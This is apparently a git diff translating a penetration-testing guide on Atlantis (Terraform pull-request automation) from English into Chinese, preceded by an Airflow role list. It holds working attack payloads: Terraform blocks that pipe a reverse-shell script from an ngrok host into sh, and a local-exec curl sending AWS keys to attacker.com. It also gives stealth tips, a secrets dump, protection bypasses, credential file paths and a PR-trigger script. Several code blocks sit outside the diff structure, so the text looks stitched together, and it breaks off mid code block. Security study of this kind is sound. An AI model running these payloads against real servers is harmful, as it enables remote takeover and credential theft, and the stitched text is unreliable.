DAG Code 上读取,可以在 Plugins 上读取,可以在 DAG Dependencies 上读取,可以在 Jobs 上读取,可以在 My Password 上读取,可以在 My Password 上编辑,可以在 My Profile 上读取,可以在 My Profile 上编辑,可以在 SLA Misses 上读取,可以在 Task Logs 上读取,可以在 Website 上读取,菜单访问 Browse,菜单访问 DAG Dependencies,菜单访问 DAG Runs,菜单访问 Documentation,菜单访问 Docs,菜单访问 Jobs,菜单访问 Audit Logs,菜单访问 Plugins,菜单访问 SLA Misses,菜单访问 Task Instances,可以在 Task Instances 上创建,可以在 Task Instances 上删除] - **Viewer** -\[can read on DAGs, can read on DAG Runs, can read on Task Instances, can read on Audit Logs, can read on ImportError, can read on XComs, can read on DAG Code, can read on Plugins, can read on DAG Dependencies, can read on Jobs, can read on My Password, can edit on My Password, can read on My Profile, can edit on My Profile, can read on SLA Misses, can read on Task Logs, can read on Website, menu access on Browse, menu access on DAG Dependencies, menu access on DAG Runs, menu access on Documentation, menu access on Docs, menu access on Jobs, menu access on Audit Logs, menu access on Plugins, menu access on SLA Misses, menu access on Task Instances] +\[可以在 DAGs 上读取,可以在 DAG Runs 上读取,可以在 Task Instances 上读取,可以在 Audit Logs 上读取,可以在 ImportError 上读取,可以在 XComs 上读取,可以在 DAG Code 上读取,可以在 Plugins 上读取,可以在 DAG Dependencies 上读取,可以在 Jobs 上读取,可以在 My Password 上读取,可以在 My Password 上编辑,可以在 My Profile 上读取,可以在 My Profile 上编辑,可以在 SLA Misses 上读取,可以在 Task Logs 上读取,可以在 Website 上读取,菜单访问 Browse,菜单访问 DAG Dependencies,菜单访问 DAG Runs,菜单访问 Documentation,菜单访问 Docs,菜单访问 Jobs,菜单访问 Audit Logs,菜单访问 Plugins,菜单访问 SLA Misses,菜单访问 Task Instances] - **Public** \[] {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/atlantis-security.md b/src/pentesting-ci-cd/atlantis-security.md index a4b35140f..551a30a82 100644 --- a/src/pentesting-ci-cd/atlantis-security.md +++ b/src/pentesting-ci-cd/atlantis-security.md @@ -4,109 +4,109 @@ ### Basic Information -Atlantis basically helps you to to run terraform from Pull Requests from your git server. +Atlantis 基本上帮助你从 git 服务器的 Pull Requests 运行 terraform。 ![](<../images/image (161).png>) ### Local Lab -1. Go to the **atlantis releases page** in [https://github.com/runatlantis/atlantis/releases](https://github.com/runatlantis/atlantis/releases) and **download** the one that suits you. -2. Create a **personal token** (with repo access) of your **github** user -3. Execute `./atlantis testdrive` and it will create a **demo repo** you can use to **talk to atlantis** - 1. You can access the web page in 127.0.0.1:4141 +1. 前往 **atlantis releases page** 在 [https://github.com/runatlantis/atlantis/releases](https://github.com/runatlantis/atlantis/releases) 并 **下载** 适合你的版本。 +2. 创建一个 **个人令牌**(具有 repo 访问权限)你的 **github** 用户 +3. 执行 `./atlantis testdrive`,它将创建一个你可以用来 **与 atlantis 交互的 demo repo** +1. 你可以在 127.0.0.1:4141 访问网页 ### Atlantis Access #### Git Server Credentials -**Atlantis** support several git hosts such as **Github**, **Gitlab**, **Bitbucket** and **Azure DevOps**.\ -However, in order to access the repos in those platforms and perform actions, it needs to have some **privileged access granted to them** (at least write permissions).\ -[**The docs**](https://www.runatlantis.io/docs/access-credentials.html#create-an-atlantis-user-optional) encourage to create a user in these platform specifically for Atlantis, but some people might use personal accounts. 
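
Before looking at credentials, it is worth checking whether the Atlantis service itself is reachable. A minimal unauthenticated probe, assuming the default port 4141 and a placeholder hostname; the root path serves the UI and `/events` is the webhook receiver:

```python
import requests

TARGET = "http://atlantis.example.com:4141"   # placeholder candidate host

for path in ("/", "/events"):
    try:
        resp = requests.get(f"{TARGET}{path}", timeout=5)
        # A body mentioning "atlantis" on the root path is a strong indicator
        print(path, resp.status_code, "atlantis" in resp.text.lower())
    except requests.RequestException as exc:
        print(path, "error:", exc)
```
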
+**Atlantis** 支持多个 git 主机,如 **Github**、**Gitlab**、**Bitbucket** 和 **Azure DevOps**。\ +然而,为了访问这些平台上的 repos 并执行操作,它需要一些 **特权访问权限**(至少写权限)。\ +[**文档**](https://www.runatlantis.io/docs/access-credentials.html#create-an-atlantis-user-optional) 鼓励在这些平台上为 Atlantis 创建一个用户,但有些人可能会使用个人账户。 > [!WARNING] -> In any case, from an attackers perspective, the **Atlantis account** is going to be one very **interesting** **to compromise**. +> 在任何情况下,从攻击者的角度来看,**Atlantis 账户**将是一个非常 **有趣的** **目标**。 #### Webhooks -Atlantis uses optionally [**Webhook secrets**](https://www.runatlantis.io/docs/webhook-secrets.html#generating-a-webhook-secret) to validate that the **webhooks** it receives from your Git host are **legitimate**. +Atlantis 可选地使用 [**Webhook secrets**](https://www.runatlantis.io/docs/webhook-secrets.html#generating-a-webhook-secret) 来验证它从你的 Git 主机接收到的 **webhooks** 是否是 **合法的**。 -One way to confirm this would be to **allowlist requests to only come from the IPs** of your Git host but an easier way is to use a Webhook Secret. +确认这一点的一种方法是 **仅允许来自 Git 主机的 IP 的请求**,但更简单的方法是使用 Webhook Secret。 -Note that unless you use a private github or bitbucket server, you will need to expose webhook endpoints to the Internet. +请注意,除非你使用私有的 github 或 bitbucket 服务器,否则你需要将 webhook 端点暴露到互联网。 > [!WARNING] -> Atlantis is going to be **exposing webhooks** so the git server can send it information. From an attackers perspective it would be interesting to know **if you can send it messages**. +> Atlantis 将 **暴露 webhooks**,以便 git 服务器可以向其发送信息。从攻击者的角度来看,了解 **你是否可以向其发送消息** 将是有趣的。 #### Provider Credentials -[From the docs:](https://www.runatlantis.io/docs/provider-credentials.html) +[来自文档:](https://www.runatlantis.io/docs/provider-credentials.html) -Atlantis runs Terraform by simply **executing `terraform plan` and `apply`** commands on the server **Atlantis is hosted on**. Just like when you run Terraform locally, Atlantis needs credentials for your specific provider. +Atlantis 通过简单地 **在托管 Atlantis 的服务器上执行 `terraform plan` 和 `apply`** 命令来运行 Terraform。就像在本地运行 Terraform 一样,Atlantis 需要你特定提供者的凭据。 -It's up to you how you [provide credentials](https://www.runatlantis.io/docs/provider-credentials.html#aws-specific-info) for your specific provider to Atlantis: +你可以选择如何 [提供凭据](https://www.runatlantis.io/docs/provider-credentials.html#aws-specific-info) 给 Atlantis: -- The Atlantis [Helm Chart](https://www.runatlantis.io/docs/deployment.html#kubernetes-helm-chart) and [AWS Fargate Module](https://www.runatlantis.io/docs/deployment.html#aws-fargate) have their own mechanisms for provider credentials. Read their docs. -- If you're running Atlantis in a cloud then many clouds have ways to give cloud API access to applications running on them, ex: - - [AWS EC2 Roles](https://registry.terraform.io/providers/hashicorp/aws/latest/docs) (Search for "EC2 Role") - - [GCE Instance Service Accounts](https://registry.terraform.io/providers/hashicorp/google/latest/docs/guides/provider_reference) -- Many users set environment variables, ex. `AWS_ACCESS_KEY`, where Atlantis is running. -- Others create the necessary config files, ex. `~/.aws/credentials`, where Atlantis is running. -- Use the [HashiCorp Vault Provider](https://registry.terraform.io/providers/hashicorp/vault/latest/docs) to obtain provider credentials. 
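下面是一个假设性的最小排查草图:如果已经能够在托管 Atlantis 的主机或容器内执行命令,可以按上面列出的几种凭据提供方式逐一检查(其中的文件路径与元数据端点只是常见默认值,并非所有环境都存在):

```bash
# 假设示例:按常见的凭据提供方式逐一排查(路径/端点为常见默认值,未必存在)
env | grep -iE 'aws|google|azure|vault|token|secret|key'      # 环境变量方式
cat ~/.aws/credentials 2>/dev/null                            # 配置文件方式
# 云上运行时,实例元数据端点可能暴露角色凭据(此处以 AWS IMDSv1 为例)
curl -s -m 2 http://169.254.169.254/latest/meta-data/iam/security-credentials/ 2>/dev/null
```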
+- Atlantis [Helm Chart](https://www.runatlantis.io/docs/deployment.html#kubernetes-helm-chart) 和 [AWS Fargate Module](https://www.runatlantis.io/docs/deployment.html#aws-fargate) 有自己的提供者凭据机制。请阅读它们的文档。 +- 如果你在云中运行 Atlantis,那么许多云都有方法为在其上运行的应用程序提供云 API 访问权限,例如: +- [AWS EC2 Roles](https://registry.terraform.io/providers/hashicorp/aws/latest/docs)(搜索 "EC2 Role") +- [GCE Instance Service Accounts](https://registry.terraform.io/providers/hashicorp/google/latest/docs/guides/provider_reference) +- 许多用户设置环境变量,例如 `AWS_ACCESS_KEY`,在 Atlantis 运行的地方。 +- 其他人创建必要的配置文件,例如 `~/.aws/credentials`,在 Atlantis 运行的地方。 +- 使用 [HashiCorp Vault Provider](https://registry.terraform.io/providers/hashicorp/vault/latest/docs) 获取提供者凭据。 > [!WARNING] -> The **container** where **Atlantis** is **running** will highly probably **contain privileged credentials** to the providers (AWS, GCP, Github...) that Atlantis is managing via Terraform. +> **运行** **Atlantis** 的 **容器** 很可能 **包含特权凭据**,用于 Atlantis 通过 Terraform 管理的提供者(AWS、GCP、Github...)。 #### Web Page -By default Atlantis will run a **web page in the port 4141 in localhost**. This page just allows you to enable/disable atlantis apply and check the plan status of the repos and unlock them (it doesn't allow to modify things, so it isn't that useful). +默认情况下,Atlantis 将在 **localhost 的 4141 端口运行一个网页**。此页面仅允许你启用/禁用 atlantis apply 并检查 repos 的计划状态并解锁它们(它不允许修改内容,因此不是很有用)。 -You probably won't find it exposed to the internet, but it looks like by default **no credentials are needed** to access it (and if they are `atlantis`:`atlantis` are the **default** ones). +你可能不会发现它暴露在互联网上,但默认情况下 **不需要凭据** 来访问它(如果需要,`atlantis`:`atlantis` 是 **默认** 的)。 ### Server Configuration -Configuration to `atlantis server` can be specified via command line flags, environment variables, a config file or a mix of the three. +对 `atlantis server` 的配置可以通过命令行标志、环境变量、配置文件或三者的混合来指定。 -- You can find [**here the list of flags**](https://www.runatlantis.io/docs/server-configuration.html#server-configuration) supported by Atlantis server -- You can find [**here how to transform a config option into an env var**](https://www.runatlantis.io/docs/server-configuration.html#environment-variables) +- 你可以在 [**这里找到标志列表**](https://www.runatlantis.io/docs/server-configuration.html#server-configuration) 由 Atlantis 服务器支持 +- 你可以在 [**这里找到如何将配置选项转换为环境变量**](https://www.runatlantis.io/docs/server-configuration.html#environment-variables) -Values are **chosen in this order**: +值的 **选择顺序** 为: -1. Flags -2. Environment Variables -3. Config File +1. 标志 +2. 环境变量 +3. 配置文件 > [!WARNING] -> Note that in the configuration you might find interesting values such as **tokens and passwords**. +> 请注意,在配置中你可能会发现一些有趣的值,如 **令牌和密码**。 #### Repos Configuration -Some configurations affects **how the repos are managed**. However, it's possible that **each repo require different settings**, so there are ways to specify each repo. This is the priority order: +一些配置影响 **repos 的管理方式**。然而,可能 **每个 repo 需要不同的设置**,因此有方法指定每个 repo。这是优先顺序: -1. Repo [**`/atlantis.yml`**](https://www.runatlantis.io/docs/repo-level-atlantis-yaml.html#repo-level-atlantis-yaml-config) file. This file can be used to specify how atlantis should treat the repo. However, by default some keys cannot be specified here without some flags allowing it. - 1. Probably required to be allowed by flags like `allowed_overrides` or `allow_custom_workflows` -2. 
[**Server Side Config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config): You can pass it with the flag `--repo-config` and it's a yaml configuring new settings for each repo (regexes supported) -3. **Default** values +1. Repo [**`/atlantis.yml`**](https://www.runatlantis.io/docs/repo-level-atlantis-yaml.html#repo-level-atlantis-yaml-config) 文件。此文件可用于指定 atlantis 应如何处理该 repo。然而,默认情况下某些键在没有某些标志允许的情况下无法在此处指定。 +1. 可能需要通过标志如 `allowed_overrides` 或 `allow_custom_workflows` 进行允许 +2. [**Server Side Config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config):你可以通过标志 `--repo-config` 传递它,这是一个 yaml 配置每个 repo 的新设置(支持正则表达式) +3. **默认** 值 **PR Protections** -Atlantis allows to indicate if you want the **PR** to be **`approved`** by somebody else (even if that isn't set in the branch protection) and/or be **`mergeable`** (branch protections passed) **before running apply**. From a security point of view, to set both options a recommended. +Atlantis 允许指示你是否希望 **PR** 被其他人 **`批准`**(即使在分支保护中未设置)和/或在运行 apply 之前 **`可合并`**(分支保护通过)。从安全角度来看,设置这两个选项是推荐的。 -In case `allowed_overrides` is True, these setting can be **overwritten on each project by the `/atlantis.yml` file**. +如果 `allowed_overrides` 为 True,这些设置可以在每个项目的 `/atlantis.yml` 文件中 **被覆盖**。 **Scripts** -The repo config can **specify scripts** to run [**before**](https://www.runatlantis.io/docs/pre-workflow-hooks.html#usage) (_pre workflow hooks_) and [**after**](https://www.runatlantis.io/docs/post-workflow-hooks.html) (_post workflow hooks_) a **workflow is executed.** +repo 配置可以 **指定脚本** 在 [**之前**](https://www.runatlantis.io/docs/pre-workflow-hooks.html#usage)(_预工作流钩子_)和 [**之后**](https://www.runatlantis.io/docs/post-workflow-hooks.html)(_后工作流钩子_)执行 **工作流**。 -There isn't any option to allow **specifying** these scripts in the **repo `/atlantis.yml`** file. +没有任何选项允许在 **repo `/atlantis.yml`** 文件中 **指定** 这些脚本。 **Workflow** -In the repo config (server side config) you can [**specify a new default workflow**](https://www.runatlantis.io/docs/server-side-repo-config.html#change-the-default-atlantis-workflow), or [**create new custom workflows**](https://www.runatlantis.io/docs/custom-workflows.html#custom-workflows)**.** You can also **specify** which **repos** can **access** the **new** ones generated.\ -Then, you can allow the **atlantis.yaml** file of each repo to **specify the workflow to use.** +在 repo 配置(服务器端配置)中,你可以 [**指定一个新的默认工作流**](https://www.runatlantis.io/docs/server-side-repo-config.html#change-the-default-atlantis-workflow),或 [**创建新的自定义工作流**](https://www.runatlantis.io/docs/custom-workflows.html#custom-workflows)**。** 你还可以 **指定** 哪些 **repos** 可以 **访问** 生成的新工作流。\ +然后,你可以允许每个 repo 的 **atlantis.yaml** 文件 **指定要使用的工作流**。 > [!CAUTION] -> If the [**server side config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config) flag `allow_custom_workflows` is set to **True**, workflows can be **specified** in the **`atlantis.yaml`** file of each repo. It's also potentially needed that **`allowed_overrides`** specifies also **`workflow`** to **override the workflow** that is going to be used.\ -> This will basically give **RCE in the Atlantis server to any user that can access that repo**. 
+> 如果 [**server side config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config) 标志 `allow_custom_workflows` 设置为 **True**,则可以在每个 repo 的 **`atlantis.yaml`** 文件中 **指定** 工作流。也可能需要 **`allowed_overrides`** 也指定 **`workflow`** 以 **覆盖将要使用的工作流**。\ +> 这基本上会给 **任何可以访问该 repo 的用户在 Atlantis 服务器上提供 RCE**。 > > ```yaml > # atlantis.yaml @@ -126,19 +126,18 @@ Then, you can allow the **atlantis.yaml** file of each repo to **specify the wor **Conftest Policy Checking** -Atlantis supports running **server-side** [**conftest**](https://www.conftest.dev/) **policies** against the plan output. Common usecases for using this step include: +Atlantis 支持在计划输出上运行 **服务器端** [**conftest**](https://www.conftest.dev/) **策略**。使用此步骤的常见用例包括: -- Denying usage of a list of modules -- Asserting attributes of a resource at creation time -- Catching unintentional resource deletions -- Preventing security risks (ie. exposing secure ports to the public) +- 拒绝使用模块列表 +- 在创建时断言资源的属性 +- 捕获无意的资源删除 +- 防止安全风险(即将安全端口暴露给公众) -You can check how to configure it in [**the docs**](https://www.runatlantis.io/docs/policy-checking.html#how-it-works). +你可以在 [**文档中**](https://www.runatlantis.io/docs/policy-checking.html#how-it-works) 查看如何配置它。 ### Atlantis Commands -[**In the docs**](https://www.runatlantis.io/docs/using-atlantis.html#using-atlantis) you can find the options you can use to run Atlantis: - +[**在文档中**](https://www.runatlantis.io/docs/using-atlantis.html#using-atlantis) 你可以找到运行 Atlantis 的选项: ```bash # Get help atlantis help @@ -161,94 +160,82 @@ atlantis apply [options] -- [terraform apply flags] ## --verbose ## You can also add extra terraform options ``` - -### Attacks +### 攻击 > [!WARNING] -> If during the exploitation you find this **error**: `Error: Error acquiring the state lock` - -You can fix it by running: +> 如果在利用过程中发现此 **错误**: `Error: Error acquiring the state lock` +您可以通过运行以下命令来修复它: ``` atlantis unlock #You might need to run this in a different PR atlantis plan -- -lock=false ``` +#### Atlantis plan RCE - 在新PR中修改配置 -#### Atlantis plan RCE - Config modification in new PR - -If you have write access over a repository you will be able to create a new branch on it and generate a PR. If you can **execute `atlantis plan`** (or maybe it's automatically executed) **you will be able to RCE inside the Atlantis server**. - -You can do this by making [**Atlantis load an external data source**](https://registry.terraform.io/providers/hashicorp/external/latest/docs/data-sources/data_source). 
Just put a payload like the following in the `main.tf` file: +如果您对一个仓库具有写入权限,您将能够在其上创建一个新分支并生成一个PR。如果您可以**执行 `atlantis plan`**(或者可能是自动执行的)**您将能够在Atlantis服务器内部进行RCE**。 +您可以通过让[**Atlantis加载外部数据源**](https://registry.terraform.io/providers/hashicorp/external/latest/docs/data-sources/data_source)来做到这一点。只需在`main.tf`文件中放入如下有效负载: ```json data "external" "example" { - program = ["sh", "-c", "curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh"] +program = ["sh", "-c", "curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh"] } ``` +**更隐蔽的攻击** -**Stealthier Attack** - -You can perform this attack even in a **stealthier way**, by following this suggestions: - -- Instead of adding the rev shell directly into the terraform file, you can **load an external resource** that contains the rev shell: +您可以通过遵循以下建议以**更隐蔽的方式**执行此攻击: +- 不要直接将反向 shell 添加到 terraform 文件中,您可以**加载一个外部资源**,该资源包含反向 shell: ```javascript module "not_rev_shell" { - source = "git@github.com:carlospolop/terraform_external_module_rev_shell//modules" +source = "git@github.com:carlospolop/terraform_external_module_rev_shell//modules" } ``` +您可以在 [https://github.com/carlospolop/terraform_external_module_rev_shell/tree/main/modules](https://github.com/carlospolop/terraform_external_module_rev_shell/tree/main/modules) 找到 rev shell 代码。 -You can find the rev shell code in [https://github.com/carlospolop/terraform_external_module_rev_shell/tree/main/modules](https://github.com/carlospolop/terraform_external_module_rev_shell/tree/main/modules) +- 在外部资源中,使用 **ref** 功能来隐藏 **repo 中分支的 terraform rev shell 代码**,类似于:`git@github.com:carlospolop/terraform_external_module_rev_shell//modules?ref=b401d2b` +- **而不是** 创建一个 **PR 到 master** 来触发 Atlantis,**创建 2 个分支**(test1 和 test2),并从一个分支创建一个 **PR 到另一个分支**。当您完成攻击后,只需 **删除 PR 和分支**。 -- In the external resource, use the **ref** feature to hide the **terraform rev shell code in a branch** inside of the repo, something like: `git@github.com:carlospolop/terraform_external_module_rev_shell//modules?ref=b401d2b` -- **Instead** of creating a **PR to master** to trigger Atlantis, **create 2 branches** (test1 and test2) and create a **PR from one to the other**. When you have completed the attack, just **remove the PR and the branches**. - -#### Atlantis plan Secrets Dump - -You can **dump secrets used by terraform** running `atlantis plan` (`terraform plan`) by putting something like this in the terraform file: +#### Atlantis 计划秘密转储 +您可以通过在 terraform 文件中放置类似以下内容来 **转储 terraform 使用的秘密**,运行 `atlantis plan`(`terraform plan`): ```json output "dotoken" { - value = nonsensitive(var.do_token) +value = nonsensitive(var.do_token) } ``` +#### Atlantis apply RCE - 在新PR中修改配置 -#### Atlantis apply RCE - Config modification in new PR +如果您对一个仓库具有写入权限,您将能够在其上创建一个新分支并生成一个PR。如果您可以**执行 `atlantis apply`,您将能够在Atlantis服务器内部进行RCE**。 -If you have write access over a repository you will be able to create a new branch on it and generate a PR. If you can **execute `atlantis apply` you will be able to RCE inside the Atlantis server**. +然而,您通常需要绕过一些保护措施: -However, you will usually need to bypass some protections: - -- **Mergeable**: If this protection is set in Atlantis, you can only run **`atlantis apply` if the PR is mergeable** (which means that the branch protection need to be bypassed). 
- - Check potential [**branch protections bypasses**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/broken-reference/README.md) -- **Approved**: If this protection is set in Atlantis, some **other user must approve the PR** before you can run `atlantis apply` - - By default you can abuse the [**Gitbot token to bypass this protection**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/broken-reference/README.md) - -Running **`terraform apply` on a malicious Terraform file with** [**local-exec**](https://www.terraform.io/docs/provisioners/local-exec.html)**.**\ -You just need to make sure some payload like the following ones ends in the `main.tf` file: +- **可合并**:如果在Atlantis中设置了此保护,您只能在**PR可合并时运行 `atlantis apply`**(这意味着需要绕过分支保护)。 +- 检查潜在的[**分支保护绕过**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/broken-reference/README.md) +- **已批准**:如果在Atlantis中设置了此保护,**其他用户必须批准PR**,您才能运行 `atlantis apply` +- 默认情况下,您可以滥用[**Gitbot令牌来绕过此保护**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/broken-reference/README.md) +在恶意Terraform文件上运行**`terraform apply`,使用**[**local-exec**](https://www.terraform.io/docs/provisioners/local-exec.html)**。**\ +您只需确保一些有效载荷,如以下内容,结束在 `main.tf` 文件中: ```json // Payload 1 to just steal a secret resource "null_resource" "secret_stealer" { - provisioner "local-exec" { - command = "curl https://attacker.com?access_key=$AWS_ACCESS_KEY&secret=$AWS_SECRET_KEY" - } +provisioner "local-exec" { +command = "curl https://attacker.com?access_key=$AWS_ACCESS_KEY&secret=$AWS_SECRET_KEY" +} } // Payload 2 to get a rev shell resource "null_resource" "rev_shell" { - provisioner "local-exec" { - command = "sh -c 'curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh'" - } +provisioner "local-exec" { +command = "sh -c 'curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh'" +} } ``` +遵循**前一种技术的建议**以更**隐蔽的方式**执行此攻击。 -Follow the **suggestions from the previous technique** the perform this attack in a **stealthier way**. - -#### Terraform Param Injection - -When running `atlantis plan` or `atlantis apply` terraform is being run under-needs, you can pass commands to terraform from atlantis commenting something like: +#### Terraform 参数注入 +当运行 `atlantis plan` 或 `atlantis apply` 时,terraform 在后台运行,您可以通过在 atlantis 中评论类似的内容来向 terraform 传递命令: ```bash atlantis plan -- atlantis plan -- -h #Get terraform plan help @@ -256,18 +243,17 @@ atlantis plan -- -h #Get terraform plan help atlantis apply -- atlantis apply -- -h #Get terraform apply help ``` +可以传递的内容是环境变量,这可能有助于绕过某些保护。请查看 terraform 环境变量在 [https://www.terraform.io/cli/config/environment-variables](https://www.terraform.io/cli/config/environment-variables) -Something you can pass are env variables which might be helpful to bypass some protections. Check terraform env vars in [https://www.terraform.io/cli/config/environment-variables](https://www.terraform.io/cli/config/environment-variables) +#### 自定义工作流 -#### Custom Workflow - -Running **malicious custom build commands** specified in an `atlantis.yaml` file. 
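下面是一个假设性的操作草图,演示如何把上述 `main.tf` 推到新分支、发起 PR 并通过评论触发 Atlantis(假设本地已安装并登录 `gh` CLI;分支名、提交信息等均为虚构):

```bash
# 假设示例:提交恶意 main.tf 并通过 PR 评论触发 plan/apply(名称均为占位符)
git checkout -b chore/update-tags
git add main.tf
git commit -m "chore: update resource tags"
git push origin chore/update-tags
gh pr create --base master --title "chore: update resource tags" --body "minor cleanup"
# 如果 plan 未自动执行,可手动评论触发;apply 仍需满足或绕过上面提到的 mergeable/approved 保护
gh pr comment chore/update-tags --body "atlantis plan"
gh pr comment chore/update-tags --body "atlantis apply"
```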
Atlantis uses the `atlantis.yaml` file from the pull request branch, **not** of `master`.\ -This possibility was mentioned in a previous section: +运行在 `atlantis.yaml` 文件中指定的 **恶意自定义构建命令**。Atlantis 使用来自拉取请求分支的 `atlantis.yaml` 文件,**而不是** `master`。\ +这个可能性在前面的部分中提到过: > [!CAUTION] -> If the [**server side config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config) flag `allow_custom_workflows` is set to **True**, workflows can be **specified** in the **`atlantis.yaml`** file of each repo. It's also potentially needed that **`allowed_overrides`** specifies also **`workflow`** to **override the workflow** that is going to be used. +> 如果 [**服务器端配置**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config) 标志 `allow_custom_workflows` 设置为 **True**,则可以在每个仓库的 **`atlantis.yaml`** 文件中 **指定** 工作流。还可能需要 **`allowed_overrides`** 也指定 **`workflow`** 以 **覆盖将要使用的工作流**。 > -> This will basically give **RCE in the Atlantis server to any user that can access that repo**. +> 这基本上会给 **任何可以访问该仓库的用户在 Atlantis 服务器上提供 RCE**。 > > ```yaml > # atlantis.yaml @@ -286,99 +272,97 @@ This possibility was mentioned in a previous section: > - run: my custom apply command > ``` -#### Bypass plan/apply protections - -If the [**server side config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config) flag `allowed_overrides` _has_ `apply_requirements` configured, it's possible for a repo to **modify the plan/apply protections to bypass them**. +#### 绕过计划/应用保护 +如果 [**服务器端配置**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config) 标志 `allowed_overrides` _已_ 配置 `apply_requirements`,则仓库可以 **修改计划/应用保护以绕过它们**。 ```yaml repos: - - id: /.*/ - apply_requirements: [] +- id: /.*/ +apply_requirements: [] ``` - #### PR Hijacking -If someone sends **`atlantis plan/apply` comments on your valid pull requests,** it will cause terraform to run when you don't want it to. +如果有人在您的有效拉取请求上发送 **`atlantis plan/apply`** 评论,这将导致 terraform 在您不希望它运行时执行。 -Moreover, if you don't have configured in the **branch protection** to ask to **reevaluate** every PR when a **new commit is pushed** to it, someone could **write malicious configs** (check previous scenarios) in the terraform config, run `atlantis plan/apply` and gain RCE. +此外,如果您没有在 **分支保护** 中配置在 **新提交推送** 到它时要求 **重新评估** 每个 PR,那么有人可能会在 terraform 配置中 **编写恶意配置**(查看之前的场景),运行 `atlantis plan/apply` 并获得 RCE。 -This is the **setting** in Github branch protections: +这是 Github 分支保护中的 **设置**: ![](<../images/image (216).png>) #### Webhook Secret -If you manage to **steal the webhook secret** used or if there **isn't any webhook secret** being used, you could **call the Atlantis webhook** and **invoke atlatis commands** directly. +如果您设法 **窃取 webhook secret** 或者 **没有使用任何 webhook secret**,您可以 **调用 Atlantis webhook** 并 **直接调用 atlantis 命令**。 #### Bitbucket -Bitbucket Cloud does **not support webhook secrets**. This could allow attackers to **spoof requests from Bitbucket**. Ensure you are allowing only Bitbucket IPs. +Bitbucket Cloud **不支持 webhook secrets**。这可能允许攻击者 **伪造来自 Bitbucket 的请求**。确保您只允许 Bitbucket 的 IP。 -- This means that an **attacker** could make **fake requests to Atlantis** that look like they're coming from Bitbucket. -- If you are specifying `--repo-allowlist` then they could only fake requests pertaining to those repos so the most damage they could do would be to plan/apply on your own repos. 
-- To prevent this, allowlist [Bitbucket's IP addresses](https://confluence.atlassian.com/bitbucket/what-are-the-bitbucket-cloud-ip-addresses-i-should-use-to-configure-my-corporate-firewall-343343385.html) (see Outbound IPv4 addresses). +- 这意味着 **攻击者** 可以向 **Atlantis** 发出看似来自 Bitbucket 的 **虚假请求**。 +- 如果您指定了 `--repo-allowlist`,那么他们只能伪造与那些仓库相关的请求,因此他们能造成的最大损害就是在您自己的仓库上进行计划/应用。 +- 为了防止这种情况,请允许 [Bitbucket 的 IP 地址](https://confluence.atlassian.com/bitbucket/what-are-the-bitbucket-cloud-ip-addresses-i-should-use-to-configure-my-corporate-firewall-343343385.html)(请参见出站 IPv4 地址)。 ### Post-Exploitation -If you managed to get access to the server or at least you got a LFI there are some interesting things you should try to read: +如果您设法访问了服务器,或者至少获得了 LFI,有一些有趣的内容您应该尝试读取: -- `/home/atlantis/.git-credentials` Contains vcs access credentials -- `/atlantis-data/atlantis.db` Contains vcs access credentials with more info -- `/atlantis-data/repos/`_`/`_`////.terraform/terraform.tfstate` Terraform stated file - - Example: /atlantis-data/repos/ghOrg\_/_myRepo/20/default/env/prod/.terraform/terraform.tfstate -- `/proc/1/environ` Env variables -- `/proc/[2-20]/cmdline` Cmd line of `atlantis server` (may contain sensitive data) +- `/home/atlantis/.git-credentials` 包含 vcs 访问凭据 +- `/atlantis-data/atlantis.db` 包含更多信息的 vcs 访问凭据 +- `/atlantis-data/repos/`_`/`_`////.terraform/terraform.tfstate` Terraform 状态文件 +- 示例:/atlantis-data/repos/ghOrg\_/_myRepo/20/default/env/prod/.terraform/terraform.tfstate +- `/proc/1/environ` 环境变量 +- `/proc/[2-20]/cmdline` `atlantis server` 的命令行(可能包含敏感数据) ### Mitigations #### Don't Use On Public Repos -Because anyone can comment on public pull requests, even with all the security mitigations available, it's still dangerous to run Atlantis on public repos without proper configuration of the security settings. +因为任何人都可以在公共拉取请求上评论,即使有所有可用的安全缓解措施,在没有适当配置安全设置的情况下,在公共仓库上运行 Atlantis 仍然是危险的。 #### Don't Use `--allow-fork-prs` -If you're running on a public repo (which isn't recommended, see above) you shouldn't set `--allow-fork-prs` (defaults to false) because anyone can open up a pull request from their fork to your repo. +如果您在公共仓库上运行(不推荐,见上文),您不应该设置 `--allow-fork-prs`(默认为 false),因为任何人都可以从他们的分叉向您的仓库打开拉取请求。 #### `--repo-allowlist` -Atlantis requires you to specify a allowlist of repositories it will accept webhooks from via the `--repo-allowlist` flag. For example: +Atlantis 要求您通过 `--repo-allowlist` 标志指定一个允许列表,接受来自该列表的 webhook。例如: -- Specific repositories: `--repo-allowlist=github.com/runatlantis/atlantis,github.com/runatlantis/atlantis-tests` -- Your whole organization: `--repo-allowlist=github.com/runatlantis/*` -- Every repository in your GitHub Enterprise install: `--repo-allowlist=github.yourcompany.com/*` -- All repositories: `--repo-allowlist=*`. Useful for when you're in a protected network but dangerous without also setting a webhook secret. +- 特定仓库:`--repo-allowlist=github.com/runatlantis/atlantis,github.com/runatlantis/atlantis-tests` +- 您的整个组织:`--repo-allowlist=github.com/runatlantis/*` +- 您的 GitHub 企业安装中的每个仓库:`--repo-allowlist=github.yourcompany.com/*` +- 所有仓库:`--repo-allowlist=*`。在受保护的网络中使用时很有用,但如果没有设置 webhook secret 则很危险。 -This flag ensures your Atlantis install isn't being used with repositories you don't control. See `atlantis server --help` for more details. 
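针对上文 "Webhook Secret" 小节提到的情况(密钥泄露或根本未配置),可以先用一个假设性的探测请求大致判断暴露在外的 `/events` 端点是否校验签名(URL 为占位符,返回码的含义仅供参考):

```bash
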